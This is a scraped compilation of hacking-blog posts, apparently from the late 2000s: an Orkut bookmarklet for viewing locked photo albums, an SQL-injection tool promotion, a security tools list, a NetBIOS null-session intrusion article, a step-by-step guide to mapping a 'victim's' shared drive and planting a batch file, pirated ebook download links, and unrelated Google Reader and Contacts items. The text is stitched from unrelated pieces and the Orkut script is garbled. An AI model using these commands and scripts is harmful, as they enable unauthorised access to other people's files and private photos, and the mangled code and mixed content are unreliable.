Orkut Album Hack : View Photos From Locked Orkut Album!

Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE.

---

Next time you see a profile with locked album do not get annoyed! Just use following codes and all photos from album will appear on screen!

javascript:alert("Wait for few seconds for pic`s to load......");nb= document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);nb=parseInt(nb);document.body.innerHTML=”

ALBUM HACK
SCRIPT BY Ethical Hacking Community”;for(i=1;i<=100;i++){document.body.innerHTML+=’



’;};void(0)

Steps to use above code:

1. Go to the profile with locked album.
2. Paste above code in address bar/navigation bar.
3. HIT Enter key and all photos from locked album will appear on screen!

IMPORTANT: (Added on Jan 3, 2008)

Code in above box are lengthy. So crosscheck following…

• when you paste code and hit enter you should get a box with OK button and message “Wait for few seconds for pics to load……”
• If scripts executes successfully you will see a page with very big title “ALBUM HACKSCRIPT BY Ethical Hacking Community”

Successful execution of script may not always give you results as per expectations! So…

Few Notes: (Added on Jan 3, 2008)

• Script may not work on few profile. The problem faced by Amit was this only. He encountered one such exception profile. Try on other profiles before reporting problem here.
• Script may not show all pics. Worst you will get to see only one pic.
• Script can not fetch full pics but large thumbnails only you can see.

I got this hack by email from surun and also read about similar hack on jerry’s blog few days back. I wanted to post about it but orkut rectified it quickly!

Related: View Scraps from Locked Scrapbook

---

Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE.

Pangolin - Automatic SQL Injection Tool

Pangolin is an automatic SQL injection penetration testing tool developed by NOSEC. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Database Support

• Access: Informations (Database Path; Root Path; Drivers); Data
• MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree
• MySql: Informations; Data; FileReader; FileWriter;
• Oracle: Inforatmions (Version; IP; Database; Accounts ……); Data; and any others;
• Informix: Informatons; Data
• DB2: Informatons; Data; and more;
• Sybase: Informatons; Data; and more;
• PostgreSQL: Informatons; Data; FileReader;
• Sqlite: Informatons; Data

At present, most of the functions are directed at MSSQL and MySql coupled with Oracle and Access. Other small and medium-sized companies are using DB2, Informix, Sybase, PostgreSQL, as well as Sqlite which isn’t so common.

You can download Pangolin here:
pangolin_free_edition_2.1.2.924.rar

Top 15 Security/Hacking Tools & Utilities

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

• Verify that your network is set up the way you intended.
• Find locations with poor coverage in your WLAN.
• Detect other networks that may be causing interference on your network.
• Detect unauthorized “rogue” access points in your workplace.
• Help aim directional antennas for long-haul WLAN links.
• Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Get hping Here

Remote Network Penetration via NetBios Hack/Hacking

These are basic techniques but very useful when penetration testing any Windows based network, the techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility.

This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.

When targetting a given network, the first thing an intruder would do, would be to portscan the remote machine or network. A lot of information can be gathered by a simple port scan but what the intruder is looking for is an open port 139 – the Default NetBios port. It’s surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine.

Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done.

Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.

Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in.

If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command.

The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.

Interpretation the information can reveal more than one might think.

Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

Switches
   -a    Lists the remote computer's name table given its host name.
   -A    Lists the remote computer's name table given its IP address.
   -c    Lists the remote name cache including the IP addresses.
   -n    Lists local NetBIOS names.
   -r    Lists names resolved by broadcast and via WINS.
   -R    Purges and reloads the remote cache name table.
   -S    Lists sessions table with the destination IP addresses.
   -s    Lists sessions table conversions.

The column headings generated by NBTSTAT have the following meanings:

Input
     Number of bytes received.
Output
     Number of bytes sent.
In/Out
     Whether the connection is from the computer (outbound)
     or from another system to the local computer (inbound).
Life
     The remaining time that a name table cache entry will "live"
     before your computer purges it.
Local Name
     The local NetBIOS name given to the connection.
Remote Host
     The name or IP address of the remote host.
Type
     A name can have one of two types: unique or group.
     The last byte of the 16 character NetBIOS name often
     means something because the same name can be present
     multiple times on the same computer. This shows the last
     byte of the name converted into hex.
State
     Your NetBIOS connections will be shown in one of the
     following "states": 

State                   Meaning

Accepting         An incoming connection is in process.

Associated        The endpoint for a connection has been created
                      and your computer has associated it with an IP
                      address.

Connected         This is a good state! It means you're connected
                       to the remote resource.

Connecting        Your session is trying to resolve the name-to-IP
                       address mapping of the destination resource.

Disconnected      Your computer requested a disconnect, and it is
                        waiting for the remote computer to do so.

Disconnecting     Your connection is ending.

Idle              The remote computer has been opened in the current
                   session, but is currently not accepting connections.

Inbound           An inbound session is trying to connect.

Listening         The remote computer is available.

Outbound          Your session is creating the TCP connection.

Reconnecting      If your connection failed on the first attempt,
                        it will display this state as it tries to reconnect.

Here is a sample NBTSTAT response of my NT Box:

C:\>nbtstat -A 195.171.236.139

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MR_B10NDE      <00>  UNIQUE      Registered
WINSEKURE LABS <00>  GROUP       Registered
MR_B10NDE      <03>  UNIQUE      Registered
MR_B10NDE      <20>  UNIQUE      Registered
WINSEKURE LABS <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00

Using the table below, what can you learn about the machine?

Name   Number  Type  Usage
=========================================================================

 00  U  Workstation Service
 01  U  Messenger Service
<\\_MSBROWSE_> 01  G  Master Browser
 03  U  Messenger Service
 06  U  RAS Server Service
 1F  U  NetDDE Service
 20  U  File Server Service
 21  U  RAS Client Service

 22  U  Exchange Interchange
 23  U  Exchange Store
 24  U  Exchange Directory
 30  U  Modem Sharing Server Service
 31  U  Modem Sharing Client Service
 43  U  SMS Client Remote Control
 44  U  SMS Admin Remote Control Tool
 45  U  SMS Client Remote Chat
 46  U  SMS Client Remote Transfer

 4C  U  DEC Pathworks TCPIP Service
 52  U  DEC Pathworks TCPIP Service
 87  U  Exchange MTA
 6A  U  Exchange IMC
 BE  U  Network Monitor Agent
 BF  U  Network Monitor Apps
 03  U  Messenger Service
 00  G  Domain Name
 1B  U  Domain Master Browser

 1C  G  Domain Controllers
 1D  U   Master Browser
 1E  G  Browser Service Elections
 1C  G  Internet Information Server
 00  U  Internet Information Server
 [2B]  U  Lotus Notes Server
IRISMULTICAST [2F]  G  Lotus Notes
IRISNAMESERVER [33]  G  Lotus Notes
Forte_$ND800ZA [20]  U  DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0.

An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it’s share of vulnerabilities, so this type of information is certainly useful to an intruder.

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command, Here is an example of the net view command used against my box with the open shares C:\ and C:\MP3S\

C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139

Sharename    Type         Comment
-----------------------------------------------------------------
C            Disk         Drive C:\
MP3S         Disk         My collection of MP3s
The command was completed successfully.

This information would give the intruder a list of shares which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive which he could then browse:

C:\>net use G: \\195.171.236.139\C
The command was completed successfully.

C:\>G:

G:\>

However, If the intruder was targetting a large network rather than a single remote computer, the next logical step would be to glean possible usernames from the remote machine.

A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins.

Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools

The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials.

To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:

c:\>net use \\[ip address of target machine]\ipc$ "" /user:""

If the connection is successful, the intruder could do a number of things other than gleaning a user list, but lets start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As a stand alone tool, this process is manual and very time consuming. Userlist.pl is a perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information.

At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine.

Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user – all through a null IPC session. This information gathering ability will appear in Rhino9’s soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.

With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows:

c:\>net view \\[ip address of remote machine]

Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons):

C:\>net view \\0.0.0.0
System error 5 has occurred.

Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name   Type         Used as  Comment

---------------------------------------------------------------------
Accelerator  Disk                  Agent Accelerator share for Seagate backup
Inetpub      Disk
mirc         Disk
NETLOGON     Disk                  Logon server share
www_pages    Disk
The command completed successfully.

As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored.

Once this list of shares had been given, the intruder could then proceed to issue the net use commands as described above.

50+ Google Reader Productivity Hacks

Google Reader is already a tool that can be used to boost your productivity throughout the day by letting you view your favorite blog’s feeds and posts in one spot: through your Google account. But for those of us who tend to get bogged down in a lot of useless subscriptions and really need to cut down on the minutes (or hours) we spend procrastinating each day, there are a lot of little hacks to make Google Reader more productive. We’ve compiled a list of over 50 of our favorites here.

Keyboard Shortcuts

Use these basic but necessary keyboard shortcuts to make searching, organizing, sharing and reading your feeds more efficient.

1. /: Use the forward slash to move your cursor to the search box and start looking for new stuff or saved items.
2. g then u: Type g then u to go to your subscriptions.
3. g then d: This shortcut will take you to the recommended page. If there are no recommendations, typing g then d will take you to the browse page.
4. 2: Press 2 to see your subscriptions in a list view or headline view.
5. ?: Find more keyboard shortcuts just for Google Reader by pressing the question mark.
6. Shift-s: Pressing Shift-S will share or un-share the selected item.
7. s: Star and un-star your highlighted items simply by pressing s.
8. Shift-o: Open up the highlighted subscription or folder with this shortcut.
9. g then h: Press g then h to go back to the Google Reader homepage.
10. g then shift-s: This shortcut will take you to the “Your Shared Items” page.
11. shift-n/p: n/p stands for Next/Previous, and using this combination will select the Next/Previous selection or folder.
12. v: Open up the original page of the selected item in Google Reader.
13. e: Quickly e-mail a page or other selection by pressing e when you’re in Google Reader.
14. r: Check to see if anymore unread updates have been added when you hit the r button in the navigation.

For Firefox

Firefox users like their browser’s speed and ability to add on new scripts or buttons. Check out several Google Reader-specific hacks for Firefox here.

15. Enhance Google Reader Preview: This script adds a Preview button so that you don’t have to open up an article or post all the way to read it.
16. BlogThis2Me: The BlogThis2Me script lets you “blog Google Reader’s “BlogThis!” to your own blog system, not to blogger.com,” as long as you have Firefox and Greasemonkey.
17. Smart Google Reader Subscribe Button: this script “adds an overlayed check icon when you’re subscribed to at least one of the feeds that the site advertises via auto-discovery.”
18. Gbutts 1.5.1: Gbutts is short for Google buttons, and you can add your Google Reader button, as well as any other Google buttons, to your Firefox address bar.
19. Better GReader: Better GReader works with Firefox adds a menu with extra options and features like Smart Subscribe, Preview Inline, Optimized Skin and others.
20. Google Reader Watcher: Google Reader Watcher is an add-on that makes Firefox check your Google Reader for unread fees. This download does not require Greasemonkey.
21. Quick Hide Message: Shave off milliseconds with this script, which “quickly hides the message displayed in Google Reader after performing renames, folder changes,” and other actions.
22. Auto Add Feed: The Auto Add Feed script only adds feeds to Google Reader, instead of asking you where you want it to be saved.
23. Title Unread Count: This hack moves the unread count in Google Reader to the front.
24. Greasereader: Add even more hot keys to your Google Reader systems by reading this guide.
25. Google Reader All Starred: Extract all of your starred items as links from Google Reader so that you don’t have to download each one.
26. Google Reader Read by Mouse: Set up this script so that you can use a mouse-only system to read your feeds. It uses mouse buttons for the following actions: next item, previous item, and more.

Real Time Savers

If you’re serious about making your Google Reader visits more efficient, learn how to categorize by priority, use the “next” bookmarklet, and implement scripts that let you autoscroll, review your subscriptions and more.

27. Categorize by priority: Stepcase Lifehack recommends categorizing your feeds by priority so that you don’t get bogged down in irrelevant articles.
28. Google Reader Autoscroll: The autoscroll script lets you “view and mark items as read by means of a mouse wheel and keyboard shortcuts.”
29. Mark All as Read: If you only want to read one article from a feed, you can mark everything else as read to weed out your extra entries.
30. Google Reader Scroll Reducer: With this script, you’re able to comment on and view the original site without having to scroll to the top of page to get to the URL.
31. The “Next” Bookmarklet: The Google Reader Blog discusses this hack, which “allows you to use Google Reader through just one link — clicking on it takes your browser to the next unread item in your reading list.”
32. Review your subscriptions: Are you still getting subscriptions for some obscure hobby you were only interested in a year ago? Go through your subscriptions and delete any that you don’t really want emptied into your account regularly.
33. Print Button v2.0: The Google Reader Print Button v2.0 allows users to print either the selected content or everything that’s displayed on the page in Google Reader.
34. Gmail + Google Reader: Add Google Reader into your Gmail account so you don’t have to constantly switch back and forth.
35. Google Reader Filter: Get rid of duplicate and unwanted content with this script.
36. Tag your items: Take advantage of the tagging feature on Google Reader. It’s there to help you stay organized and more productive.

Social Media Hacks

How much time do you waste each day checking all of your social media accounts? These hacks let you sync up Google Reader with Facebook, Twitter, Tumblr, Google Chat and more.

37. Google Reader + ma.gnolia: This basic script lets you add a Google Reader post to ma.gnolia.
38. Google Reader Digg News: Add a Digg button to your Google Reader posts with this script.
39. Tumblr: Sync up your Google Reader and Tumblr with this script. You can attach your reblog button or Share-on-Tumblr at the bottom of articles on Google Reader.
40. Managing Your Shared Items: This post from the Google Reader Blog shows you how to add and remove friends from your Gmail or GChat account.
41. Google Reader and Flickr: Now you embed Flickr videos into your Google Reader, so you don’t have to switch back and forth to share with extra friends or read their comments.
42. Facebook Sharer + Google Reader: Share your favorite posts and articles with Google Reader friends and Facebook friends.
43. Google Reader + del.icio.us: Use this script to define tags and links for a faster way of posting to del.icio.us.
44. Google Reader + Twitter: Use this script to add reader posts to Twitter.

Add-Ons and Solutions

Try out these add-ons to customize your Google Reader experience and streamline your Google accounts.

45. Google Reader Notifier: This extension keeps you updated by showing you how many unread items you have in your account.
46. Add a Search: Add a search engine to your Google Reader account to make searching for items faster.
47. Google Reader Optimized: Use this script to view Google Reader in a larger space. The last official update was in 2006, but Google Reader users have submitted updates.
48. Google Reader Romeo Script: Check out this script to access Google Reader from your cell phone — if you don’t have an iPhone.
49. Google Reader Button for Internet Explorer: IE users can add on a Google Reader to their browser using this tutorial.
50. iPhone Skin: iPhone users can easily view Google Reader on their phones with this special skin from developer David Cann.
51. Iris: View your Google Reader subscriptions in a Firefox sidebar.
52. Go behind the scenes: If you want to know how many people have subscribed to a certain feed, you can use this tutorial to speed up your search times.

How to access a folder or hardrive on a computer/pc on your network.

The following article explains the method used by most hackers to access someones computer/hard disk remotely using command prompt in your network ie network computer hacking.

Step 1
Get a good IP scanner angry ip scanner is a good one you can get it here: http://www.angryziber.com/ipscan/



Step 1
Get a good IP scanner angry ip scanner is a good one you can get it here: http://www.angryziber.com/ipscan/

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address.

c:\windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:

c:\windows>net view \\255.255.255.255

if the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive.

c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.


Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.



Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.

1000 Hacking Tutorials

1000 Hacking Tutorials


http://rapidshare.com/files/231508905/1000_Tutorials.rar

Great Collection Of Hacking Books (All Hacking Books from A-Z)

Great Collection Of Hacking Books (All Hacking Books from A-Z) Rapidshare Megaupload Filefactory Megashare Netload Depositfiles Free Full Download

Great Collection Of Hacking Books (All Hacking Books from A-Z) is available on a new fast direct download service with over 2,210,000 Files to choose from.Download anything with more then 1000+ Kb/s downloading speed.Signup process takes just 10 sec to go.Signup today and enjoy the speed !


http://uploading.com/files/PAQSUV0D/Collection_of_Hacking_Ebooks_Part1.rar

http://uploading.com/files/JPVAHTMA/Collection_of_Hacking_Ebooks_Part2.rar

http://uploading.com/files/JPVAHTMA/Collection_of_Hacking_Ebooks_Part3.rar

Hacking Book Collection (EBooks,Tutorial)

• BlueTooth Hacking
• Ethical Hacking
• Google Hacks
• Hack & Crack
• Hack Attacks Revealed
• Hack Attacks Testing - How To Conduct Your Own Security Audit
• Hack IT Security Through Penetration Testing
• Hack Proofing Your Network - Internet Tradecraft
• Hack Proofing Your Network Second Edition
• Hack Proofing Your Web Server
• Hack The Net
• Hack Xbox 360
• Hackers Black Book
• Hacking Firewalls And Networks How To Hack Into Remote Computers
• Hacking a Coke Machine
• Hacking and Network Defense
• Hacking for Dummies
• Hacking Intranet Websites
• Hacking Techniques
• Hacking The Cable Modem
• Hacking The Linux
• Hacking Web Applications
• Hacking Windows XP
• Hacking PSP
• Kevin Mitnick - The Art of Deception
• Kevin Mitnick - The Art of Intrusion
• Network Security Hacks - Tips & Tools For Protecting Your Privacy
• PayPal Hacks
• PC Hacks
• Simple Hacks - Addons, Macros And More
• The Database Hacker Handbook Defending Database Servers
• Wireless Hacking
• Wireless Network Hacks & Mods for Dummies

Downloads
http://rapidshare.com/files/56561574/Hacking_e-Book.part1.rar
http://rapidshare.com/files/56567737/Hacking_e-Book.part2.rar

Google launches stand-alone contacts manager

Google has launched a contacts manager that users of services like Google Docs, Picasa, and Calendar can use, without having to be a Gmail users.

Aimed at letting users share contacts more easily between different services, Google Contacts works like any other contacts function. You can import and export your contacts from other sources such as Outlook, Outlook Express, Yahoo, or Hotmail. For Apple you must use a utility called "A to G."

If you are part of a business, school or other organization using Google Apps, the administrator will have to enable this functionality within the control panel by clicking on the "add more services" link, finding the "Contacts" option and clicking the "add it now" button.

Know the Ethics and Learn Computer Hacking

By: Rose Mathew

Internet has become a bandwagon of entertainment, education and business. It beats tradition mediums in terms of the benefits it offers. But unfortunately there is much scope of anonymity/privacy on the web and helps the cyber terrorists prey up on the internet resources. That’s why, it is encouraged to learn computer hacking to counter the actions of unethical hackers (also known as black hats).

Hacking is a fraudulent act that is illegal in some ways and helpful in others. It is to know the programmable systems and how they work in a network. An ethical hacker shows the downfalls in the security system of an organization so they can improve it. Today hacking has become an art and very popular that hackers have formed groups and even have conferences together to share their knowledge. Hacking for whatever the purpose, good or bad, requires knowledge and much programming skills. An intelligent programmer can be a good ethical/unethical hacker. These days "hacker" is being used as a term for expert, intelligent and creative people. Let’s discuss how to learn computer hacking:


10 Tips to Learn Computer Hacking

As told before, professional hackers are generally more intelligent than any average programmer. So becoming a hacker depends a lot on one’s intelligence and efforts. However, the following tips will help you learn computer hacking in a systematically.

1. Be curious: Curiosity is the mother of hacking. Look under the hood. Take things apart. Know the details of your system directories, file systems, system files. Look inside your computer.
   
   
2. Read a lot: Buy lots of books, go through the tutorials. Read the help files on your system. If you are using Linux/Unix read the man files.
   
   
3. Experiment: Take precautions and experiment whatever you read. Apply to work the idea that just hit your mind. Don't be afraid to change things. Doing this for a long time will give you much idea on the computer hardware and the operating system. Try using command options and switches. Tweak the registry and see what happens. Change settings in .INI files. In Linux/Unix, visit the directories where you normally don’t need to go.
   
   
4. Make backups: If you start mucking around with system files, registries, password files, and such, you will eventually destroy your system. Have a backup ready. If you can afford it, have a system you use just for experimenting, ready to reload on a moment's notice, and do your serious work (or serious gaming!) on a different computer.
   
   
5. Think out of box: Hacking is not restricted to computers only. You can try trick on other networks also like mobile, telephone, etc.
   
   
6. Get some real tools: You can find numerous hacking tools on the net. Though some serious tools are not available for free, you need to have some Hex file editors, Snoopers, Compilers and APIs. In addition you also need Scripting tools, Disk editors/formatters and Disassemblers.
   
   
7. Learn to program: Serious ethical hackers are always very good programmers. If you want to be a hacker, you're going to learn much programming. You should also be quite familiar with the popular operating systems like Windows, Linux, Unix, OS2 etc. Of course, the choice of language depends on you. In Unix and Unix-like OS (Linux, Free BSD) Perl is very good to start with. Use VB or Java to program in Windows. Which ever platform you use, you need to learn considerable C/C++. You should know more than one language because no one language is right for every task.
   
   
8. Discuss with peers: In isolation, you can’t learn anything. You need to take classes, join users groups and computer clubs. Talking to people on IRC or other chat programs proves really helpful. Share what you learn. Because to get something you have to give some.
   
   
9. Do some projects: Pick some projects and work consistently until you've finished them. Real time experience is better than reading. Build from ground zero, learn to create icons, associate it with some files, read how the search engines search, try to manipulate the programs that you use daily.
   
   
10. Use the Internet: There is no source greater than the Internet. Start with the Web. Learn how to use Boolean searches. Bookmark all those sites which you find worth visiting. Sometimes you will find useful information at the most strangest places.

Detailed Courses of Study to Learn Hacking

• Techniques: Windows Hacking, Registries Editing, Password cracks, Google hacking, Computer Forensics, Firewalls, Network Hacking, Security tools, Hacking tools, Encryption, Email tracking, Router Hacking, Email Forging, Port Scanning , MAC Address Spoofing, Proxies etc.
  
  
• Tools: Key loggers, Anti Key Loggers, Firewalls, MAC Address Spoofing, Proxy Bouncing tools, Network Scanners like IPscan, Sniffers, Spyware and Trojan Detectors, Information Gathering Tools, Remote Administration Tools, Computer Forensics Tools, Steganography tools and a lot more.
  
  
• Games: Hacking Simulation Games to understand the world of hacking and provides you with the opportunity to practice hacking without the danger of getting caught

10 Commandments of Ethical Hacking

1. Don’t a computer to harm other people.
   
   
2. Don’t interfere with other people's computer work.
   
   
3. Don’t snoop around in other people's computer files.
   
   
4. Don’t use a computer to steal.
   
   
5. Don’t use a computer to bear false witness.
   
   
6. Don’t copy or use proprietary software for which you have not paid.
   
   
7. Don’t use other people's computer resources without authorization or compensation.
   
   
8. Don’t appropriate other people's intellectual output.
   
   
9. Think about the social consequences of the program you are writing.
   
   
10. Always use a computer in ways that insure consideration and respect for your fellow humans.